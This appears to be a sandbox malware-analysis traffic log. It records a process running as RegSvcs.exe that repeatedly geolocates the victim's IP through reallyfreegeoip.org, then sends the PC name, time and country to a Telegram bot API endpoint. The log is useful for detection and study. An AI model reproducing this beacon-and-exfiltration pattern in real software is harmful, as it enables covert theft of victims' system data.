                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549706188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:07 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2025-01-08 14:44:07 UTC857INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:07 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662236
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCBc%2Bjf6JQhAh5YNvjmrwAAEAhL%2BEHjxWdFK5882M9YTJhSQS9x48q8xtFqo2GJA4cnO7Cjjyk1iO92Ey4gZxAs0O%2BwowFul0gXFmnCn2CvxHJS5nYiHOD%2Fhs4KaFXS4pwNR0P6f"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6b94b691875-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1697&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1702623&cwnd=153&unsent_bytes=0&cid=a87431826dbe8dbc&ts=176&x=0"
                                                                                                  2025-01-08 14:44:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.549708188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:08 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2025-01-08 14:44:08 UTC857INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:08 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662237
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQ5bTs%2BwojQejyAbihLGe%2FCFdqKzHz2mJKppdM5kP3hDfTYU6lvoySqnHqzxnZdvlhoDh7Dfa6vtchgmPD8u3VqDfIGbdiKGXtp8xbY%2BemUJO%2Busx2wNKUbALyE7DQuPDW2LwICW"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6c209694315-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1593&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1768625&cwnd=218&unsent_bytes=0&cid=138fa5eb47b30278&ts=169&x=0"
                                                                                                  2025-01-08 14:44:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.549710188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:09 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2025-01-08 14:44:10 UTC859INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:09 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662239
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgPn3mKfGXQ6B5xxFYYI77aEAoNn%2BO5VM%2BxqhKAlzHjpt8O8CG3axBkF%2FZwsjOh6yGDlYFXaqfF6tb9TOjvKtWP9rB9dipMzCP%2BhNFhYXc2Zq15iPds2HMVTAEtrvSdQgpPdX%2BOa"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6ca398d41ac-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1742&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1560662&cwnd=252&unsent_bytes=0&cid=f879c25afee12ee0&ts=160&x=0"
                                                                                                  2025-01-08 14:44:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.549712188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:11 UTC859INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:11 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662240
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zv4Ooz1k0osUMrGIKaCSlC%2BnTMSNZlQAk%2F4jbuj0oN1mHKAvhDeXBXVdwCzKCJHRTZjtEdsu0kOq%2FtYp2k%2Fmv9rt5ORI7kWbTnLqIJopB9mXx63I81hBVvFvom3ADz3t0Des3Zr%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6d299d6c34f-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1505&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1684939&cwnd=181&unsent_bytes=0&cid=e1289ed93d861074&ts=165&x=0"
                                                                                                  2025-01-08 14:44:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.549714188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:12 UTC851INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:12 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662241
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QFXDRcgApKSGBQB5u8iLHUa4I4tnaq93NFiiIFwjsorfOFzKOuaIVrnMaxoXw8Sskp4QGGtSIogdAd%2BdOZzIQjiMLCbi70TKWSDz2OiVxwlltpRWQQ5E1QwNzLq8e5dO16OPvex4"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6dadafa1889-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1701&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1689814&cwnd=252&unsent_bytes=0&cid=50e514f6dfba60eb&ts=140&x=0"
                                                                                                  2025-01-08 14:44:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.549716188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:13 UTC853INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:13 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662243
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFnNRp6uzWzr57bLV12pa8Az550Q7DzmyyHllVXNQv9qJCrkghXnYg1efNTsP06%2Bl0aqsB6PlWFL9LxMU0fZfvdjWZCuUQT5XytAggv1COSRyyUPXLHVCorjLKY0DetUu%2FYRgc5J"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6e2d9db41f9-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1755&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1642294&cwnd=216&unsent_bytes=0&cid=68a7037852d2f85b&ts=136&x=0"
                                                                                                  2025-01-08 14:44:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.549718188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2025-01-08 14:44:15 UTC859INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:15 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662244
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fqsk1UO5xvE90OWjZzVsBQQDuw5Ny700pV61eeFnN2pHLxCGnpFiirf%2B1cAp9JCOLsf0rdeyFu27NRVKBlQMxC8Kt7JISjDEBa60gBdZjy1LqgjSsybNpSl%2Bmh%2BDYp1%2BgBL9L4yX"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6eb2ad641e7-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1758&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1658148&cwnd=202&unsent_bytes=0&cid=aa96ac6d14286d17&ts=158&x=0"
                                                                                                  2025-01-08 14:44:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.549723188.114.96.34434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:16 UTC855INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:16 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662245
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyM2AWveCHdi7kJY0hfN61QU9IcIPfHzdVHGS7eHPl8HXPAKZttqreH30ezXqf%2B0ZJmJl4TttL3S91VW%2FHM33ZFqUkpin1mdysopZzljIF1yNwVWTZAPIKOaRN3t8xvDsc6v5%2FHi"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf6f339dd0fa7-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1534&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1903520&cwnd=220&unsent_bytes=0&cid=daf01a169c33856b&ts=145&x=0"
                                                                                                  2025-01-08 14:44:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.549726149.154.167.2204434612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:17 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                  Host: api.telegram.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:17 UTC344INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Wed, 08 Jan 2025 14:44:17 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 55
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  2025-01-08 14:44:17 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.549760188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:23 UTC863INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:23 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662252
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Op5SoDcgSziHEnx%2B7dWhdYlwIVl%2Fas%2FpY%2FJvQj6XPPG7i%2FcRxVPCCW20zgwhzX%2FXZZ1FVJhHATmv%2FpwtiwAhDJ4UNI1bjxLIzaipLBw9lq0QAJX5fxZk3cvajFGEVneF2djU4dov"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf71c78e843f3-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
